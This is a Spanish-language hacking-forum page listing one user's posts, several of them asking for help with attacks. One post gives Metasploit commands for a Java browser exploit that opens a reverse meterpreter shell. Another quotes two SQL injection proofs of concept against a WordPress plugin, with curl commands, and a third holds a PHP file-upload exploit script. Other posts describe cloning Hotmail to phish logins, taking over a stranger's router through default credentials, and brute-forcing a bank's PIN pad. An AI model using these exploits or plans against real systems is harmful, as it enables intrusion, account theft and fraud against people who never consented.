Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - TapIt

#1
Mensajería / Monitorizar IRC desde el cliente
24 Febrero 2014, 11:17 AM
Hola a todos,

Estoy realizando un trabajo sobre IRC y me gustaría obtener información sobre los programas o tecnicas para un canal pero desde el lado del cliente. Guardar conversaciones publicas, conexiones y desconexiones de usuarios... etc.

¿Sabeis si existe algo al respecto? Gracias por adelantado,

Saludos!
#2
GNU/Linux / Actualizar CentOS PHP 5.3
11 Julio 2013, 13:30 PM
Hola a todos!!

Estoy intentando fortalecer un servidor Apache Tomcat version: 2.2.15 corriendo en un Centos 6.4. Para hacer unas pruebas iniciales le he tirado OpenVAS y a parte de otras alertas me ha dicho que la version de PHP es 5.3< 5.3.6 y que debe ser actualizada.

Me han comentado que aunque pase esto, puede ser que la version 5.3 para CentOS 6.4 ya este parcheada sin necesidad de actualizarla a una superior. Puede ser esto? Me parece un poco raro pero no se...

Gracias a todos, espero vuestras respuestas ;)
#3
Bugs y Exploits / Metasploit out of LAN
10 Junio 2013, 20:57 PM
Buenas a todos:

He visto temas parecidos por el foro pero en ninguno se llega a ninguna conclusión sobre el problema.

He montado en casa un laboratorio para testear Metasploit fuera de LAN compuesto por dos ordenadores conectados a 2 routers diferentes de IP pública diferente.

MAQUINA1

PC corriendo Máquina Virtual Kali Linux
IP privada 192.168.1.16
IP publica 88.88.88.88 (inventada por motivos de seguridad)
El router tiene los puertos (80,445 y 4444) fordwardeados a la IP 192.168.1.16

MAQUINA2

Laptot corriendo Máquina Virtual Windows XP SP2 (Java 7 update 6)
El router se supone que no es necesario que tenga ningún puerto abierto puesto que cuando se ejecuta el exploit entra en juego NATP


*******************************************************

En la MAQUINA1

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.1.16
set SRVPORT 80
set URIPATH /ataque

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 88.88.88.88

exploit


En la MAQUINA2

Entro en la URL a través del navegador en la URL 88.88.88.88/ataque

Saltan las alertas de ejecutar un applet de java etc... ACEPTO TODO y parece que se empieza a ejecutar el Applet pero salta una alerta que dice "No se pudo ejecutar el programa".

Metasploit se queda a la espera de un sesión pero no sucede nada... Sinceramente no se que ocurre. He probado el mismo ataque en local y no hay problemas. ¿Alguna idea?

Gracias por adelantado, Saludos ;)


#4
Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/



# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php

---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
   ...
   $limit = intval($_POST['limit']);
   $page_offset = (intval($_POST['offset']) - 1) * $limit;

   foreach($_POST["item"] as $key => $value){
       $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
       $result = mysql_query($sql);
   }
}



http://www.exploit-db.com/exploits/17764/


# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)

---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php

---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
   ...
   $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
   $result = mysql_query($sql);


#5
Buenas a todos,

Me gustaría saber si existe información sobre redes abiertas en las que se requiere un usuario y contraseña que deben ser ingresados en el navegador para poder acceder a ellas (Universidades, Internet de pago en sitios públicos...) "este usuario y contraseña es único para cada usuario". ¿Que tipo de arquitectura utilizan? ¿Requieren un software especifico? ¿Son igual de peligrosas que una red pública normal? Toda información al respecto será bienvenida ya que he buscado en internet pero no he conseguido encontrar nada claro. (No importa si está en inglés)

Muchisimas gracias. Saludos!

#6
Nivel Web / Exploit PHP para wordpress
11 Noviembre 2012, 15:13 PM
Muy buenas, estoy intentando utilizar este exploit en PHP.
http://www.exploit-db.com/exploits/18990/

Lo he hecho de la siguiente forma:

He creado un archivo de nombre "exploit.php" al que le añadido este código y lo he subido a un servidor web.
<?php

$uploadfile
="lo.php";
$ch 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
         array(
'Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Mi pregunta es:
Se supone que lo.php será el nombre del archivo que quiero subir al servidor. Para que el exploit lo encuentre lo he situado en la misma carpeta que está alojado el exploit.

¿Estoy haciendolo correctamente? He realizado varias pruebas en webs que deberían ser vulnerables pero no lo he conseguido.

Muchas gracias por adelantado. Saludos!!
#7
Nivel Web / Metodo PUT en servidor web
9 Noviembre 2012, 12:42 PM
Muy buenas!

Mi duda es sencilla pero creo que no tengo los conocimientos suficientes para entender lo que está ocurriendo.

Realizo una petición OPTIONS a un servidor y obtengo como respuesta:

Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS


Posteriormente intento utilizar el metodo PUT y obtengo el siguiente mensaje:

HTTP/1.1 403 Prohibido
Date: Fri, 09 Nov 2012 11:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 973
Connection: close
Content-Type: text/html;charset=utf-8

<html><head><title>Apache Tomcat/5.0.30 - Informe de Error</title><style>

</style> </head><body><h1>Estado HTTP 403 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Informe de estado</p><p><b>mensaje</b> <u></u></p><p><b>descripción</b> <u>El acceso al recurso especificado () ha sido prohibido.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.0.30</h3></body></html>[/move]


Alguien sabe a que se debe esto?

Muchas gracias por antelación. Saludos ;)
#8
Seguridad / Archivos DFL
30 Julio 2012, 03:55 AM
Alguien sabe exactamente que archivos son los .DFL Signature Default Program Settings y como pueden abrirse en windows?

Tengo entendido que sor archivos de error generados por programas cuando este falla pero no estoy muy seguro de ellos...

Saludos!
#9
Hacking / Abriendo archivos DS_store
23 Julio 2012, 13:40 PM
Muy buenas! En la actualidad es posible encontrar en multiples paginas una vulnerabilidad que nos permite visualizar el arbol de directorios de una web al generarse los archivos ocultos .DS_store.

Alguien sabe como se pueden visualizar estos archivos en windows? por lo que he leido deben modificarse de UTF-16 a UTF-8 pero no tengo ni idea de hacerlo...


Saludos!! ;)
#10
Hacking / Clonar WEBs
19 Julio 2012, 11:20 AM
Buenas!!

He estado jugando con SET pero todas las opciones de clonar webs son con el fin de obtener el control de la maquina atacada. Mi pregunta es, ¿existe alguna forma de clonar una web con SET u otro programa pero para otros fines?

Se me ocurre por ejemplo alojar un clon de hotmail en mi servidor y que el usuario phiseado ingrese los datos de login.Estos datos sean obtenidos y redireccionarle a la web original de hotmail.

Evidentemente la obtencion y la redireccion de los datos sería programado por mi solo me interesaría el aspecto gráfico.

No quiero que penseis que soy un lamer que le quiere robar el password a su novia, he puesto hotmail por poner un ejemplo ya que esto tiene muchas aplicaciones y me consta que se utiliza.

Saludos!
#11
Hacking / No puedo abrir puerto 23
15 Julio 2012, 13:47 PM
Hola a todos:

El otro día encontré un router vulnerable al cual no era muy dificil de entrar ya que tenia el usuario y contraseña por defecto de fábrica. ip=xx.xxx.xx.x16

Le pase el nmap y resulta que el puerto 23 estaba filtrado por lo que decidía abrirlo desde la interfaz gráfica (ya que tenía acceso a través del navegador) para enroutarlo a la ip= 192.168.1.1 que es en la que se aloja el router.

Vuelvo a pasarle el nmap y me dice que el puerto sigue estando filtrado e intento entrar desde telnet y me dice "Connection timed out".

Alguien sabe donde puede estar el problema? el router es un Huawei HG655b

Saludos!
#12
Bugs y Exploits / Ejecutar codigo javascript
12 Junio 2012, 02:39 AM
Hola buenas,

Me he empezado a interesar por el mundillo de la seguridad web pero todavía me queda mucho camino por recorrer. Investigando en la web de un banco he encontrado algo que podría ser un fallo de seguridad a ver si consigo explicarlo:

En el sistema de acceso a las gestiones de tu cuenta online, se debe ingresar tu DNI y un número de 4 digitos a través de un panel en el que debes pulsar los números como si se tratara de un cajero automático. Estos numero aparecen en un orden aleatorio con el fin de evitar fuerza bruta pero si se observa el codigo, lo único que hace cada uno de esos botones es llamar a una función meterDigito() y el numero correspondiente. P.ej si yo pulso el 4 llama a meterDigito(4).

Mi pregunta es, puedo de alguna forma ejecutar un script que llame a esa función meterDigito() en forma de bucle para acceder por fuerza bruta? He estado intentando con iMacros pero no consigo saber como ejecutar funciones de que se encuentren la propia pagina, igual simplemente no se puede hacer pero lo dudo ya que el javascript se ejecuta del lado del cliente gracias por vuestra ayuda ;)

Saludos!!